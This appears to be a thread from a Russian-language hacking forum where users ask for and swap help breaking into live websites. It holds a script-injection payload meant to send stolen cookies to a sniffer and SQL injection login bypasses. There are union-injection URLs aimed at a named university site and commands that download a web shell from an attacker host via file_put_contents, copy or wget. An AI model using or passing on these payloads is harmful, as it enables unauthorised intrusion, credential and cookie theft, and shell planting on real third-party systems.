нашел пассивку вместо alert%28document.cookie%29 вставил type=text/javascript%20src=http://мойсайт.org/script.js Разные варианты пробовал, но все-ровно не приходят куки на сниффер, подскажите что не так, а то заколебался. сам script.js
Как обойти фильтрацию кавычки функцией eregi_replace ??? есть такой код: <php ... foreach($_POST as $var => $val){ $_POST[$var]=trim(eregi_replace("'","''",$val)); // экранит кавычку( вместо одной появляется две } ... $rez=mysql_query("select id from admins where admlogin='".$_POST["login"]."' and admpass=password('".$_POST["pass"]."');",$link); > логин\пасс вбиваются через форму и шлются POST'OM. Делаю инъект в логин: login=admin' # & pass=anyparol и тут бы все хорошо, но срабатывающий erig_replace превращает select в такое: Query select id from admins where admlogin='admin' ' #' and admpass=password('anyparol'). Исходник скрипта у меня есть и я пробовал убирать строку с фильтрацией тогда можно логиниться без пасса! Помагите пожалуйста обойти экранирование!
Мы продаем или покупаем!? (С) Одесситы Поставь воблу на локалхост и мониторь через пэхапэадмин. Сначала поглядишь на локалхосте, а когда будет sql на чужом сервере уже будешь знать имена таблиц - они стандартные для всех. Если чтото изменено (что врядли) смотри имена таблиц в информайшин схеме сервера, что своего что чужого.
Помогите раскрутить MsSql PHP: http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15--+f
Code: http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(115)%2Bchar(101)%2Bchar(109)%2Bchar(105)%2Bchar(110)%2Bchar(97)%2Bchar(114)%2Bchar(115))--+f в чаре первая таблица "seminars", далее выводим вторую "newsitems", тоже переводим ее в чар и через запятую добавляем, также надо будет делать и с колонками ))
to kingbeef Не надо страдать ерундой и загонять в char... Все и так нормально работает. Code: http://genetics.rutgers.edu/?page=faculty/faculty_details&id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15+from+information_schema.tables+where+table_name+not+in+('seminars','newsitems')--+f
php-injection В общем нашел сайт с уязвимостью php-injection (через POST) в поле Как мне: 1) Вывести содержание какого-либо файла например index.php 2) Как залить shell? Работают только подобные команды: ${@print(phpversion())} Результат: 4.4.9 ${@print(php_uname())} Результат: FreeBSD fe45.hc.ru 8.2-RELEASE-p4 FreeBSD 8.2-RELEASE-p4 #0: Wed Oct 12 17:05:45 UTC 2011 [email protected]:/usr/obj/i386/usr/src/sys/FE i386 ${@print(mysql_get_client_info())} Результат: 4.1.25 ${@print(mysql_get_server_info())} Результат: 4.1.25-log ${@print(mysql_list_dbs())} Результат: Resource id #612 ${@print(phpinfo(INFO_GENERAL))} Результат (таблица) Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/php4/etc/php' '--disable-all' '--program-prefix=' '--enable-discard-path' '--with-regex=php' '--enable-zend-multibyte' '--prefix=/usr/local/php4' '--mandir=/usr/local/php4/man' '--infodir=/usr/local/php4/info/' '--build=i386-portbld-freebsd8.2' и т.д.
to kacergei Ну так используйте вместо print(), include() или require(), заливать шелл можно через file_put_contents('shell.php',file_get_contents('http://evilsite.com/shell.txt')), copy('http://evilsite.com/shell.txt', 'shell.php') или в system('wget -O shell.php http://evilsite.com/shell.txt'). Собственно вариантов еще много, есть из чего выбирать
Имеется скуль, присутствует фильтрация на information_schema.tables. Как обойти? Регистр, и /*!information_schema.tables*/ не помогло.
cat1vo Да в том и дело, что information_schema.columns как information_schema.tables фильтруется, я так понимаю безвыходная ситуация? P.S. Приходит в голову только брут таблиц, и колонок, как в mysql <=4 UPD. Отправка постом тоже не помогает, линк к сожалению выложить не могу.
Варианты есть, надо смотреть, что и как филтруется, и после пробовать обходить! Я тоже не экстрасенс. Выложите урл, быстрее помогут Вам!
Есть скуль. В имени базы данных присутствует тире ("db-name"). вывод ошибки, я так понимаю говорит о том, что ошибку вызывает именно тире в имени. Может кто то знает как это обойти?
нашёл на сервере уязвимость типа mod_isapi, но эксплоит не работает, потому что сервер висит с другими на одном и том же айпишнике, и соответственно все это работает на обратном прокси. вопрос: можно ли обойти этот самый прокси и запустить нормально эксплоит?
Т.к. используется реплейс одной одинарной кавычки на две, и если в коде нет больше никаких фильтраций и экранирований(и выключен magiq_quotes), то это легко обходится с помощью бэкслеша. Пример: \' union select 111# получится select id from admins where admlogin='\'' union select 111#' and admpass=password('anyparol') Первую кавычку мы экранируем, а вторую что подставит скрипт закроет запрос.
